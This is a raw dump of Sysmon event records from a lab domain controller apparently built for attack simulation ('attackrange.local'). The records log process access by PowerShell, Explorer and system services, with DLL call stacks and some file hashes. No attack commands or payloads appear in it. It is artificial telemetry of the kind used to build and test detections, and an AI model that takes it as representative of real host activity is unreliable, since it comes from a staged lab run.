21:06:59.648{4DB9351A-A273-60D3-3C05-00000000CF01}66082488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022796Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.648{4DB9351A-A273-60D3-3C05-00000000CF01}66082488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022795Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.648{4DB9351A-A273-60D3-3C05-00000000CF01}66082488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022794Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.648{4DB9351A-A273-60D3-3C05-00000000CF01}66082488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022793Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.648{4DB9351A-A273-60D3-3C05-00000000CF01}66082488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022792Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.648{4DB9351A-A273-60D3-3C05-00000000CF01}66082488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022791Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.648{4DB9351A-A273-60D3-3C05-00000000CF01}66082488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000022790Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.648{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF120305.TMPMD5=8554CEE29C03241DFB5882E9984AA700,SHA256=FB6542D6D734A4D8C127624D80AED6D404A14B78F01E3564E0322ACDDB2A2FB4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022789Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.632{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-4005-00000000CF01}1688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022788Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.616{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-4005-00000000CF01}1688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022787Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.616{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A273-60D3-4005-00000000CF01}1688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 10341000x800000000000000022786Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.616{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000022785Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.601{4DB9351A-A273-60D3-3E05-00000000CF01}4896NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\R6VMK72W7I\Microsoft.Build.Tasks.v4.0.ni.dll.auxMD5=F94E0FC97DF3DFC4D43F098310CBC805,SHA256=FAFB81EC0A129D7EDB931EC9AC3DD932FC7368C59F940276030C52C4A567AF3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022784Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.601{4DB9351A-A273-60D3-3E05-00000000CF01}4896NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\R6VMK72W7I\Microsoft.Build.Tasks.v4.0.ni.dllMD5=D846AABE337526DEF206276460FEB818,SHA256=0D2D5DD2BF0800213DAED980D76A169A3D4D8FC0E09E7D3DAC4CC3882B417B75,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022783Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.585{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2991F88F9F5871DDA166AC4268EC22A4,SHA256=B85E2CD50B46FAD73BA0BA69B4B6987B34961D4BF12B92BE7E01BE7C790FA27F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022782Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.585{4DB9351A-9DDE-60D3-1600-00000000CF01}12921440C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022781Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.585{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022780Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.554{4DB9351A-9F2C-60D3-D000-00000000CF01}50643908C:\Windows\Explorer.EXE{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022779Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.554{4DB9351A-9F2C-60D3-D000-00000000CF01}50643908C:\Windows\Explorer.EXE{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022778Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.554{4DB9351A-9F2B-60D3-C900-00000000CF01}42322492C:\Windows\system32\taskhostw.exe{4DB9351A-A273-60D3-3D05-00000000CF01}5832C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022777Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.554{4DB9351A-9F2B-60D3-C900-00000000CF01}42322492C:\Windows\system32\taskhostw.exe{4DB9351A-A273-60D3-3D05-00000000CF01}5832C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022776Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.538{4DB9351A-9F2C-60D3-D000-00000000CF01}50645312C:\Windows\Explorer.EXE{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+105f4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022775Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.538{4DB9351A-9F2C-60D3-D000-00000000CF01}50645312C:\Windows\Explorer.EXE{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+105f4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022774Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.538{4DB9351A-9F2C-60D3-D000-00000000CF01}50645312C:\Windows\Explorer.EXE{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022773Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.538{4DB9351A-9F2C-60D3-D000-00000000CF01}50645312C:\Windows\Explorer.EXE{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022772Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.538{4DB9351A-9F2C-60D3-D000-00000000CF01}50645312C:\Windows\Explorer.EXE{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022771Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.538{4DB9351A-9F2C-60D3-D000-00000000CF01}50645752C:\Windows\Explorer.EXE{4DB9351A-A273-60D3-3D05-00000000CF01}5832C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022770Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.538{4DB9351A-9F2C-60D3-D000-00000000CF01}50645752C:\Windows\Explorer.EXE{4DB9351A-A273-60D3-3D05-00000000CF01}5832C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022769Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.538{4DB9351A-9F2C-60D3-D000-00000000CF01}50645752C:\Windows\Explorer.EXE{4DB9351A-A273-60D3-3D05-00000000CF01}5832C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022768Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.538{4DB9351A-9F2C-60D3-D000-00000000CF01}50645752C:\Windows\Explorer.EXE{4DB9351A-A273-60D3-3D05-00000000CF01}5832C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022767Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.421{4DB9351A-9DDE-60D3-1600-00000000CF01}12921440C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-3D05-00000000CF01}5832C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022766Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 